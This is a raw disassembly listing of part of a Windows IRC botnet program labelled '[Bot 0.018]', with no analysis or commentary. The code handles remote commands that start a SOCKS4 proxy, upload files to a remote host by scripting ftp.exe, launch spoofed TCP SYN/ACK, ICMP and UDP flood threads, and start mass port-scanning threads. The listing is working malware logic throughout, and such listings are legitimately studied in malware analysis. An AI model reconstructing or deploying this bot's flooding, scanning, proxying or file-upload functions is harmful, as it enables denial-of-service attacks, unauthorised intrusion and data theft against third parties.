; ---------------------------------------------------------------------------
loc_40C0C8: ; CODE XREF: sub_4078FA+47A4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_404592
pop ecx
pop ecx
loc_40C0D7: ; CODE XREF: sub_4078FA+47AA�j
; sub_4078FA+47B9�j ...
push 0FFFFFFFEh
pop eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C0DF: ; CODE XREF: sub_4078FA+1107�j
; sub_4078FA+111B�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainDisconnect ; "[MAIN]: Disconnecting."
call sub_401C33
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C101: ; CODE XREF: sub_4078FA+10DF�j
; sub_4078FA+10F3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainReconnecti ; "[MAIN]: Reconnecting."
call sub_401C33
add esp, 0Ch
xor eax, eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40C122: ; CODE XREF: sub_4078FA+10B7�j
; sub_4078FA+10CB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_401000
loc_40C133: ; CODE XREF: sub_4078FA+2F6D�j
add esp, 0Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40C13B: ; CODE XREF: sub_4078FA+1017�j
; sub_4078FA+102B�j
push [ebp+ebx+var_A0]
push 1Fh
push offset aProcessList ; "Process list"
push offset aProc ; "[PROC]"
loc_40C14E: ; CODE XREF: sub_4078FA+E54�j
; sub_4078FA+E7C�j ...
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C16A: ; CODE XREF: sub_4078FA+E17�j
; sub_4078FA+E2B�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40C189
push esi
call sub_412F42
test eax, eax
pop ecx
jz short loc_40C189
push esi
call sub_412F42
pop ecx
jmp short loc_40C18E
; ---------------------------------------------------------------------------
loc_40C189: ; CODE XREF: sub_4078FA+4879�j
; sub_4078FA+4884�j
mov eax, dword_42AE40
loc_40C18E: ; CODE XREF: sub_4078FA+488D�j
mov ebx, [ebp+ebx+var_9C]
xor edi, edi
cmp ebx, edi
mov [ebp+var_2FC], eax
jz short loc_40C1B5
push ebx
loc_40C1A2: ; CODE XREF: sub_4078FA+48CB�j
lea eax, [ebp+var_30C]
push 10h
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40C1CE
; ---------------------------------------------------------------------------
loc_40C1B5: ; CODE XREF: sub_4078FA+48A5�j
cmp [ebp+var_44B], 0
jz short loc_40C1C7
lea eax, [ebp+var_E0]
push eax
jmp short loc_40C1A2
; ---------------------------------------------------------------------------
loc_40C1C7: ; CODE XREF: sub_4078FA+48C2�j
and [ebp+var_30C], 0
loc_40C1CE: ; CODE XREF: sub_4078FA+48B9�j
mov eax, [ebp+var_4]
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_2F0], eax
mov eax, [ebp+var_C]
mov [ebp+var_2EC], eax
lea eax, [ebp+var_38C]
push 80h
push eax
mov [ebp+var_390], esi
call sub_412E0D
add esp, 0Ch
push [ebp+var_2FC]
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 12h
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_2F8], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_390]
push eax
push offset sub_40FB2A
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_2F8]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C282
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_40C27A: ; CODE XREF: sub_4078FA+498E�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C282: ; CODE XREF: sub_4078FA+496D�j
cmp [ebp+var_2E8], edi
jz short loc_40C27A
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C28F: ; CODE XREF: sub_4078FA+DC7�j
; sub_4078FA+DDB�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40C2B7
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C2B7
and [ebp+var_3BC], eax
jmp short loc_40C2C1
; ---------------------------------------------------------------------------
loc_40C2B7: ; CODE XREF: sub_4078FA+49A3�j
; sub_4078FA+49B3�j
mov [ebp+var_3BC], 1
loc_40C2C1: ; CODE XREF: sub_4078FA+49BB�j
push [ebp+var_9C]
lea eax, [ebp+var_440]
push 80h
push eax
call sub_412E0D
mov eax, [ebp+arg_4]
mov [ebp+var_444], eax
mov eax, [ebp+var_4]
mov [ebp+var_3B8], eax
mov eax, [ebp+var_C]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_3BC], esi
mov [ebp+var_3B4], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40C30A
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40C30A: ; CODE XREF: sub_4078FA+4A09�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push esi
lea eax, [ebp+var_2E0]
push 1Ah
push eax
call sub_410EEA
add esp, 1Ch
mov [ebp+var_3C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_444]
push eax
push offset sub_40F023
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_3C0]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C390
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C388: ; CODE XREF: sub_4078FA+4A9C�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C390: ; CODE XREF: sub_4078FA+4A6C�j
cmp [ebp+var_3B0], esi
jz short loc_40C388
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_40C39D: ; CODE XREF: sub_4078FA+D9F�j
; sub_4078FA+DB3�j
push offset aBot0_018 ; "[Bot 0.018]"
lea eax, [ebp+var_2E0]
push offset aMainS ; "[MAIN]: %s"
push eax
call sub_412BB5
loc_40C3B3: ; CODE XREF: sub_4078FA+41AD�j
add esp, 0Ch
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40C3BB: ; CODE XREF: sub_4078FA+D77�j
; sub_4078FA+D8B�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C413
push ebx
call sub_412F42
test eax, eax
pop ecx
jl short loc_40C40B
cmp eax, 2
jge short loc_40C40B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40C403
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C403: ; CODE XREF: sub_4078FA+4AEA�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C40B: ; CODE XREF: sub_4078FA+4AD5�j
; sub_4078FA+4ADA�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40C46F
; ---------------------------------------------------------------------------
loc_40C413: ; CODE XREF: sub_4078FA+4ACA�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40C418: ; CODE XREF: sub_4078FA+4B5B�j
mov esi, [ebp+var_A4]
mov eax, edx
loc_40C420: ; CODE XREF: sub_4078FA+4B42�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40C442
test cl, cl
jz short loc_40C43E
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40C442
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40C420
loc_40C43E: ; CODE XREF: sub_4078FA+4B30�j
xor eax, eax
jmp short loc_40C447
; ---------------------------------------------------------------------------
loc_40C442: ; CODE XREF: sub_4078FA+4B2C�j
; sub_4078FA+4B3A�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40C447: ; CODE XREF: sub_4078FA+4B46�j
test eax, eax
jz short loc_40C459
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40C418
jmp short loc_40C47E
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_4078FA+4B4F�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_E0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40C46F: ; CODE XREF: sub_4078FA+3780�j
; sub_4078FA+4B0F�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40C47E: ; CODE XREF: sub_4078FA+2B08�j
; sub_4078FA+2B2C�j ...
cmp [ebp+var_C], 0
jnz short loc_40C4A1
push 0
loc_40C486: ; CODE XREF: sub_4078FA+4FD0�j
; sub_4078FA+5113�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40C499: ; CODE XREF: sub_4078FA+2611�j
; sub_4078FA+2733�j ...
call sub_4045DD
add esp, 14h
loc_40C4A1: ; CODE XREF: sub_4078FA+11E6�j
; sub_4078FA+25FB�j ...
xor esi, esi
inc esi
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40C4A9: ; CODE XREF: sub_4078FA+D4F�j
; sub_4078FA+D63�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor edx, edx
repe cmpsb
jz loc_408D7C
call sub_41105B
loc_40C4C6: ; CODE XREF: sub_4078FA+4497�j
push 0
call ds:dword_41F02C ; ExitProcess
loc_40C4CE: ; CODE XREF: sub_4078FA+156A�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C685
cmp [ebp+ebx+var_90], edx
jz loc_407B7B
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
mov edi, [ebp+ebx+var_90]
push 4
push edi
call sub_40241F
test eax, eax
pop ecx
pop ecx
jnz short loc_40C546
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40C532: ; CODE XREF: sub_4078FA+38A4�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40C546: ; CODE XREF: sub_4078FA+4C30�j
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_412D71
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_412D71
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_15E8]
push edx
push eax
lea eax, [ebp+var_1344]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_412BB5
lea eax, [ebp+var_1344]
push offset aAb ; "ab"
push eax
call sub_413393
add esp, 20h
test eax, eax
mov [ebp+arg_0], eax
jz loc_407B7B
mov esi, [ebp+ebx+var_A0]
push edi
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_41414F
push [ebp+arg_0]
call sub_412F93
lea eax, [ebp+var_1344]
push eax
lea eax, [ebp+var_B70]
push offset aSS_3 ; "-s:%s"
push eax
call sub_412BB5
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_B70]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_4335A8
test eax, eax
push esi
push edi
jz short loc_40C621
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40C626
; ---------------------------------------------------------------------------
loc_40C621: ; CODE XREF: sub_4078FA+4D1E�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40C626: ; CODE XREF: sub_4078FA+4D25�j
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40C651
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40C651: ; CODE XREF: sub_4078FA+4D38�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp short loc_40C66B
; ---------------------------------------------------------------------------
loc_40C65F: ; CODE XREF: sub_4078FA+4D84�j
lea eax, [ebp+var_1344]
push eax
call sub_414125
loc_40C66B: ; CODE XREF: sub_4078FA+4D63�j
lea eax, [ebp+var_1344]
push 4
push eax
call sub_40241F
add esp, 0Ch
test eax, eax
jnz short loc_40C65F
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40C685: ; CODE XREF: sub_4078FA+4BE2�j
; sub_4078FA+4BF6�j
push [ebp+ebx+var_90]
push [ebp+var_14]
push [ebp+ebx+var_98]
push [ebp+ebx+var_9C]
call sub_412F42
pop ecx
push eax
push [ebp+ebx+var_A0]
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4038B7
jmp loc_40CFDF
; ---------------------------------------------------------------------------
loc_40C6C4: ; CODE XREF: sub_4078FA+1542�j
; sub_4078FA+1556�j
push [ebp+ebx+var_A0]
lea eax, [ebp+var_998]
push 80h
push eax
call sub_412E0D
add esp, 0Ch
push 4
lea edi, [ebp+var_998]
mov esi, offset aSyn_0 ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 4
lea edi, [ebp+var_998]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push 7
lea edi, [ebp+var_998]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40C725
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40B61E
; ---------------------------------------------------------------------------
loc_40C725: ; CODE XREF: sub_4078FA+4DF7�j
; sub_4078FA+4E0B�j ...
push [ebp+var_14]
call sub_412F42
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_888], eax
jle loc_40C8AD
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_8], eax
mov esi, 80h
lea eax, [ebp+var_998]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_9C]
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_A18]
push esi
push eax
call sub_412E0D
mov eax, [ebp+ebx+var_98]
push eax
mov [ebp+arg_0], eax
call sub_412F42
mov [ebp+var_894], eax
mov eax, [ebp+ebx+var_90]
add esp, 1Ch
cmp eax, edi
jz short loc_40C7A6
push eax
call sub_412F42
pop ecx
mov [ebp+var_890], eax
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7A6: ; CODE XREF: sub_4078FA+4E9B�j
mov [ebp+var_890], edi
loc_40C7AC: ; CODE XREF: sub_4078FA+4EAA�j
mov ebx, [ebp+ebx+var_8C]
cmp ebx, edi
jz short loc_40C7C6
push ebx
call sub_412F42
pop ecx
mov [ebp+var_88C], eax
jmp short loc_40C7CC
; ---------------------------------------------------------------------------
loc_40C7C6: ; CODE XREF: sub_4078FA+4EBB�j
mov [ebp+var_88C], edi
loc_40C7CC: ; CODE XREF: sub_4078FA+4ECA�j
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_884], eax
mov eax, [ebp+arg_4]
mov [ebp+var_A1C], eax
lea eax, [ebp+var_918]
push eax
call sub_412E0D
mov eax, [ebp+var_4]
mov [ebp+var_880], eax
mov eax, [ebp+var_C]
add esp, 0Ch
cmp [ebp+var_884], edi
mov [ebp+var_87C], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40C820
mov eax, offset aNormal ; "Normal"
loc_40C820: ; CODE XREF: sub_4078FA+4F1F�j
push [ebp+var_14]
push [ebp+arg_0]
push [ebp+var_10]
push [ebp+var_8]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Dh
push eax
call sub_410EEA
add esp, 2Ch
mov [ebp+var_898], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_A1C]
push eax
push offset sub_41046C
push edi
push edi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_898]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40C8A3
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40B73B
; ---------------------------------------------------------------------------
loc_40C89B: ; CODE XREF: sub_4078FA+4FAF�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C8A3: ; CODE XREF: sub_4078FA+4F8E�j
cmp [ebp+var_878], edi
jz short loc_40C89B
jmp short loc_40C8C0
; ---------------------------------------------------------------------------
loc_40C8AD: ; CODE XREF: sub_4078FA+4E3E�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40C8B2: ; CODE XREF: sub_4078FA+53D4�j
; sub_4078FA+5490�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
loc_40C8BE: ; CODE XREF: sub_4078FA+3D32�j
pop ecx
pop ecx
loc_40C8C0: ; CODE XREF: sub_4078FA+3E50�j
; sub_4078FA+3E65�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40C8CF: ; CODE XREF: sub_4078FA+1506�j
; sub_4078FA+151A�j ...
cmp dword_433620, 0
jnz loc_40C9E8
mov eax, [ebp+var_C]
mov [ebp+var_758], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_75C], eax
lea eax, [ebp+var_7F0]
push eax
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
push 7Fh
push [ebp+var_9C]
mov [ebp+var_768], eax
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov eax, [ebp+arg_4]
push [ebp+var_76C]
mov [ebp+var_874], eax
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 0Fh
push eax
call sub_410EEA
add esp, 48h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406CD9
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40C9DE
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40CF6C
; ---------------------------------------------------------------------------
loc_40C9D6: ; CODE XREF: sub_4078FA+50EA�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40C9DE: ; CODE XREF: sub_4078FA+50C9�j
cmp [ebp+var_754], esi
jz short loc_40C9D6
jmp short loc_40CA03
; ---------------------------------------------------------------------------
loc_40C9E8: ; CODE XREF: sub_4078FA+4FDC�j
push 1FFh
lea eax, [ebp+var_2E0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_412C40
add esp, 0Ch
xor esi, esi
loc_40CA03: ; CODE XREF: sub_4078FA+3D0E�j
; sub_4078FA+50EC�j ...
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
jmp loc_40C486
; ---------------------------------------------------------------------------
loc_40CA12: ; CODE XREF: sub_4078FA+14CA�j
; sub_4078FA+14DE�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_758], eax
lea eax, [ebp+var_7F0]
push eax
mov [ebp+var_75C], edi
call sub_412C40
push [ebp+ebx+var_9C]
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_770], eax
call sub_412F42
push [ebp+var_14]
mov [ebp+var_76C], eax
call sub_412F42
mov ebx, [ebp+ebx+var_90]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_768], eax
jz short loc_40CA8A
push ebx
call sub_412F42
pop ecx
mov [ebp+var_764], eax
jmp short loc_40CA90
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_4078FA+517F�j
mov [ebp+var_764], esi
loc_40CA90: ; CODE XREF: sub_4078FA+518E�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_870]
push eax
call sub_412C40
push [ebp+var_768]
mov ebx, [ebp+arg_4]
push [ebp+var_76C]
lea eax, [ebp+var_7F0]
push eax
push [ebp+var_770]
lea eax, [ebp+var_2E0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_874], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 10h
push eax
call sub_410EEA
add esp, 30h
mov [ebp+var_760], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_874]
push eax
push offset sub_406E62
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_760]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40CB5F
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_40CB39: ; CODE XREF: sub_4078FA+526D�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push edi
loc_40CB44: ; CODE XREF: sub_4078FA+2AD4�j
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push ebx
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40CB57: ; CODE XREF: sub_4078FA+526B�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40CB5F: ; CODE XREF: sub_4078FA+5222�j
cmp [ebp+var_754], esi
jz short loc_40CB57
jmp short loc_40CB39
; ---------------------------------------------------------------------------
loc_40CB69: ; CODE XREF: sub_4078FA+14A2�j
; sub_4078FA+14B6�j
push 9
call sub_4110DA
mov esi, [ebp+ebx+var_9C]
push esi
mov edi, eax
call sub_412F42
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40CBBB
push edi
lea eax, [ebp+var_2E0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40AB80
; ---------------------------------------------------------------------------
loc_40CBBB: ; CODE XREF: sub_4078FA+528E�j
push [ebp+ebx+var_A0]
call sub_412F42
push esi
mov [ebp+var_4E4], eax
call sub_412F42
push [ebp+ebx+var_98]
mov [ebp+var_4CC], eax
call sub_412F42
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4E0], eax
jnb short loc_40CBFC
push 5
pop eax
mov [ebp+var_4E0], eax
loc_40CBFC: ; CODE XREF: sub_4078FA+52F7�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40CC09
mov [ebp+var_4E0], ecx
loc_40CC09: ; CODE XREF: sub_4078FA+5307�j
push [ebp+var_14]
call sub_412F42
mov [ebp+var_4DC], eax
mov eax, 320h
cmp [ebp+var_4DC], eax
pop ecx
jbe short loc_40CC2B
mov [ebp+var_4DC], eax
loc_40CC2B: ; CODE XREF: sub_4078FA+5329�j
push [ebp+arg_4]
or [ebp+var_4C8], 0FFFFFFFFh
call sub_406C33
pop ecx
lea edx, [ebp+var_66C]
loc_40CC41: ; CODE XREF: sub_4078FA+534F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CC41
xor edi, edi
cmp dword_42A068, edi
mov [ebp+var_5EC], edi
mov [ebp+var_10], edi
jz short loc_40CCC1
mov ecx, offset dword_42A068
loc_40CC63: ; CODE XREF: sub_4078FA+53A7�j
mov edi, [ebp+ebx+var_A0]
lea esi, [ecx-28h]
loc_40CC6D: ; CODE XREF: sub_4078FA+538F�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40CC8F
test al, al
jz short loc_40CC8B
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40CC8F
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40CC6D
loc_40CC8B: ; CODE XREF: sub_4078FA+537D�j
xor eax, eax
jmp short loc_40CC94
; ---------------------------------------------------------------------------
loc_40CC8F: ; CODE XREF: sub_4078FA+5379�j
; sub_4078FA+5387�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40CC94: ; CODE XREF: sub_4078FA+5393�j
test eax, eax
jz short loc_40CCA5
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40CC63
jmp short loc_40CCBF
; ---------------------------------------------------------------------------
loc_40CCA5: ; CODE XREF: sub_4078FA+539C�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42A068[ecx]
mov [ebp+var_4E4], ecx
mov [ebp+var_4C8], eax
loc_40CCBF: ; CODE XREF: sub_4078FA+53A9�j
xor edi, edi
loc_40CCC1: ; CODE XREF: sub_4078FA+5362�j
cmp [ebp+var_4E4], edi
jnz short loc_40CCD3
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CCD3: ; CODE XREF: sub_4078FA+53CD�j
mov esi, [ebp+ebx+var_90]
cmp esi, edi
mov [ebp+var_AC], esi
jz short loc_40CD14
cmp byte ptr [esi], 23h
jz short loc_40CD14
push esi
lea eax, [ebp+var_67C]
push 10h
push eax
call sub_412E0D
push 78h
push esi
call sub_413F30
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4B8], eax
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD14: ; CODE XREF: sub_4078FA+53E8�j
; sub_4078FA+53ED�j
cmp [ebp+var_432], 0
jz short loc_40CD3E
push 7Fh
lea eax, [ebp+var_66C]
push offset dword_42AF44
push eax
call sub_412C40
mov eax, dword_42AF54
add esp, 0Ch
mov [ebp+var_5EC], eax
loc_40CD3E: ; CODE XREF: sub_4078FA+5421�j
cmp [ebp+var_43B], 0
jz short loc_40CD6A
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_411120
add esp, 20h
loc_40CD6A: ; CODE XREF: sub_4078FA+544B�j
cmp [ebp+var_44B], 0
jnz short loc_40CD8F
cmp [ebp+var_44A], 0
jnz short loc_40CD8F
cmp [ebp+var_43A], 0
jnz short loc_40CD8F
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40C8B2
; ---------------------------------------------------------------------------
loc_40CD8F: ; CODE XREF: sub_4078FA+5477�j
; sub_4078FA+5480�j ...
push 10h
pop esi
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_A8], esi
call dword_433418
mov al, [ebp+var_44B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_433520
push eax
lea eax, [ebp+var_67C]
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_43A], 0
jz short loc_40CE44
xor eax, eax
cmp [ebp+var_44B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_67C]
push eax
call sub_412C10
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40CE38
loc_40CE16: ; CODE XREF: sub_4078FA+553C�j
cmp eax, edi
jz short loc_40CE38
mov byte ptr [eax], 78h
lea eax, [ebp+var_67C]
push 30h
push eax
call sub_412C10
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
